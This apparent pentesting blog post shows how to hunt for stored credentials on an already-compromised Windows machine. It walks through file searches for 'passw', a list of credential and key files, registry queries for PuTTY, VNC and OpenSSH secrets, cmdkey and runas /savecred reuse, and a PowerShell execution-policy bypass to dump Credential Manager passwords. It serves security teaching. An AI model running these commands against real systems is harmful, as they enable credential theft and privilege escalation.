Home Windows Credentials Enumeration
Post
Cancel

Windows Credentials Enumeration

Posted Dec 12, 2022
By Aftab Shaikh
3 min read

In this we will discuss about some Low Hanging Credentials file enumeration , assume that you have already compromised the Target machine and will been searching for some credential files to escalate our privilege

Low Hanging Credentials

1

dir /b /a /s c:\ > cdir.txt

Image title

AH ! What does this mean ?

it will list all the file from C: and save it into cdir.txt

Image title

instead of going through all the files we will looking for string (str) or sub string which contain passw in all of that file

1

type cdir.txt | findstr /i passw

Image title

Image title

we are lucky enough that we find something as obviously its all been setup . But yeah sometimes u will find some low hanging fruits not exactly like this but some excel spreadsheet or any documents maybe admin just mistakely saved it in the desktop or anything

Look for this Target Files

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

install, backup, .bak, .log, .bat, .cmd, .vbs, .cnf, .conf, .config, .ini, .xml, .txt, .gpg, .pgp, .p12, .der, .csr, .cer, id_rsa, id_dsa, .ovpn, .rdp, vnc, ftp, ssh, vpn, git, .kdbx, .db
unattend.xml
Unattended.xml
sysprep.inf
sysprep.xml
VARIABLES.DAT
setupinfo
setupinfo.bak
web.config
SiteList.xml
.aws\credentials
.azure\accessTokens.json
.azure\azureProfile.json
gcloud\credentials.db
gcloud\legacy_credentials
gcloud\access_tokens.db

1
2

type cdir.txt | findstr /i vnc  # searching for file name 
type c:\Users\IEUser\Downloads\ultravnc.ini | findstr /i passw # string contain in that particular file

Image title

Registry Enumeration

The registry or Windows registry is a database of information, settings, options, and other values for software and hardware, also it contains stored password for the sessions application , even ssh key if the system is using ssh

HKLM (HKEY_LOCAL_MACHINE) :- Contains computer-specific information about the hardware installed, software settings, and other information. The information is used for all users who log on to that computer. This key, and its subkeys, is one of the most frequently areas of the registry viewed and edited by users.

HKCU (HKEY_CURRENT_USER) :- Contains user who is currently logged in to Windows and their settings.

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions

It will qeuery the specific register which PuTTY Sessions to check does it stored some credentials for further enumerations

Image title

Image title

As we can se that we have found credentials in Local session of PuTTY

We can even search query for specific String in the registry just we did above with the files

1

reg query HKLM /f password /t REG_SZ /s

Image title

1
2
3
4
5

reg query "HKCU\Software\ORL\WinVNC3\Password" # For WinVNC server
reg query "HKCU\Software\TightVNC\Server" 
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # For PuTTy session
reg query "HKCU\Software\OpenSSH\Agent\Keys" # if system is using ssh
reg query HKLM /f password /t REG_SZ /s  # for seaching the specific string

we can even use like reg query HKLM /f credentials /t REG_SZ /s just like any string we want to search for

Extracting Password from Credential manager

What is Credential manager

Credential Manager lets you view and delete your saved credentials for signing in to websites, connected applications, and networks. To open Credential Manager, type credential manager in the search box on the taskbar and select Credential Manager Control panel.

But it will only Show you the option to change password you cant view password

Image title

Web Credentials shows your stored password from Internet Explorer/Microsoft Edge

Image title

Shows your stored password on your Local System

Well During your pentesting it not always necessary that u will have the UI/RDP session on TARGET MACHINE So we have to use CMD line to use the stored cred which is stored in Credentials Manager

1

cmdkey /list  # To list all the stored password

Image title

1

runas /savecred /user:admin cmd.exe

Image title

You can Only be able to use the stored creds from credential manager we are not able view them . But we can extract their password using powershell script which have been performed below

Extracting password

we will use this powershell script to extract the password from Credential manager

Powershell Script

1
2
3

powershell -ep bypass
. .\cms.ps1  
Enum-Creds

OR

1

powershell import-module C:\unknown\LPE\cms.ps1 ; Enum-Creds

Image title

Windows Privilege Escalation, Credentials Enumeration
Windows Enumeration privilege escalation
This post is licensed under CC BY 4.0 by the author.
Contents